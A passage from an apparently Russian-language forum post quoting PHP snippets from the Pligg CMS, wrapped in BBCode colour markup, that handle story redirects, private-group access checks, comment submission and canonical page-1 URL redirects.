[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]redirector[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location:[/COLOR][COLOR="#0000BB"]$my_pligg_base[/COLOR][COLOR="#DD0000"]/404error.php"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]// $main_smarty->assign('tpl_center', '404error');

// $main_smarty->display($the_template . '/pligg.tpl');

[/COLOR][COLOR="#007700"]die();

 }

[/COLOR][COLOR="#FF8000"]// Hide private group stories

[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]link_group_id[/COLOR][COLOR="#007700"])

 {

[/COLOR][COLOR="#0000BB"]$privacy[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT group_privacy FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]table_groups[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE group_id =[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]link_group_id[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

 if ([/COLOR][COLOR="#0000BB"]$privacy[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]'private'[/COLOR][COLOR="#007700"]&& ![/COLOR][COLOR="#0000BB"]isMember[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]link_group_id[/COLOR][COLOR="#007700"]))

 {

 die([/COLOR][COLOR="#DD0000"]'Access denied'[/COLOR][COLOR="#007700"]);

 }

 }

 if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'process'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'process'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){

 if ([/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'process'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"])==[/COLOR][COLOR="#DD0000"]'newcomment'[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]check_referrer[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]$vars[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]author[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'link_id'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]check_actions[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'comment_subscription'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$vars[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]insert_comment[/COLOR][COLOR="#007700"]();

 }

 }

[/COLOR][/COLOR
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$requestID[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]is_numeric[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){[/COLOR][COLOR="#0000BB"]$requestTitle[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]);}

[/COLOR][COLOR="#FF8000"]// if we're using "Friendly URL's for categories"

[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){[/COLOR][COLOR="#0000BB"]$thecat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_var[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT category_id FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]table_categories[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE `category_safe_name` = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]escape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]urlencode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sanitize[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]))).[/COLOR][COLOR="#DD0000"]"';"[/COLOR][COLOR="#007700"]);}

if([/COLOR][COLOR="#0000BB"]$requestID[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]enable_friendly_urls[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#FF8000"]// if we're using friendly urls, don't call /story.php?id=XX or /story/XX/

 // this is to prevent google from thinking it's spam

 // more work needs to be done on this

[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Link[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$requestID[/COLOR][COLOR="#007700"];

 if([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]() ==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]|| ([/COLOR][COLOR="#0000BB"]$thecat[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]category[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$thecat[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location:[/COLOR][COLOR="#0000BB"]$my_pligg_base[/COLOR][COLOR="#DD0000"]/404error.php"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]// $main_smarty->assign('tpl_center', '404error');

// $main_smarty->display($the_template . '/pligg.tpl');

[/COLOR][COLOR="#007700"]die();

 }

[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getmyurl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"storyURL"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]category_safe_name[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]category[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]urlencode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]title_url[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$link[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]Header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP/1.1 301 Moved Permanently"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]Header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);

die();

}

[/COLOR][/COLOR
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]// AFFERO GENERAL PUBLIC LICENSE is also included in the file called "COPYING".

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]str_ends_with[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$haystack[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$needle[/COLOR][COLOR="#007700"]) {

 return ([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$haystack[/COLOR][COLOR="#007700"], -[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$needle[/COLOR][COLOR="#007700"]) ) ===[/COLOR][COLOR="#0000BB"]$needle[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]$needle[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#FF8000"]/* If the URL is too verbose (specifying index.php or page 1), then, of course

* we just want the main page, which defaults to page 1 anyway. */

[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]parse_url[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]]);

if ([/COLOR][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'index.php'[/COLOR][COLOR="#007700"]) !==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]|| ( isset ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]))

{

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP/1.1 301 Moved Permanently"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'page=1'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: ./"[/COLOR][COLOR="#007700"].([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] ?[/COLOR][COLOR="#DD0000"]'?'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]));

 exit;

}

elseif ([/COLOR][COLOR="#0000BB"]str_ends_with[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'/page/1'[/COLOR][COLOR="#007700"]) ||[/COLOR][COLOR="#0000BB"]str_ends_with[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'/page/1/'[/COLOR][COLOR="#007700"]))

{

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP/1.1 301 Moved Permanently"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: ../"[/COLOR][COLOR="#007700"].([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] ?[/COLOR][COLOR="#DD0000"]'?'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'QUERY_STRING'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]));

 exit;

}

[/COLOR][/COLOR
 
Ответить с цитированием